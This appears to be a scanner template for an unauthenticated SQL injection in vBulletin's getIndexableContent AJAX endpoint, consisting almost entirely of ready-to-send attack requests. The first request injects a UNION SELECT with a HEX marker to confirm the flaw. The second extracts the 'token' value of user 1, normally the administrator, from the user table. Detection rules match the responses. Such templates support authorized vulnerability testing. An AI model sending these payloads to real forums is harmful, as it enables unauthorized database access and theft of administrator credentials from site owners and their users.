id: php-vbulletin-sqli
info:
  name: vBulletin Unauthenticaed SQLi
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - prefix: |
      /
requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.prefix}}ajax/api/content_infraction/getIndexableContent
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
      - X-Requested-With: "XMLHttpRequest"
    body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--"
    detections:
      - >-
        StatusCode() == 200 && StringSearch('resHeaders','application/json') && StringSearch('response', 'rawtext":"6162636D31')
      - >-
        StatusCode() == 200 && StringSearch('resHeaders','application/json') && StringSearch('response', 'There has been a database error')

  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.prefix}}ajax/api/content_infraction/getIndexableContent
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
      - X-Requested-With: "XMLHttpRequest"
    body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--"
    detections:
      - >-
        StatusCode() == 200 && StringSearch('resHeaders','application/json') && StringSearch('response', 'rawtext":"$')
      - >-
        StatusCode() == 200 && StringSearch('resHeaders','application/json') && StringSearch('response', 'There has been a database error')

reference:
  - link: https://twitter.com/Zenofex/status/1260164977077424128
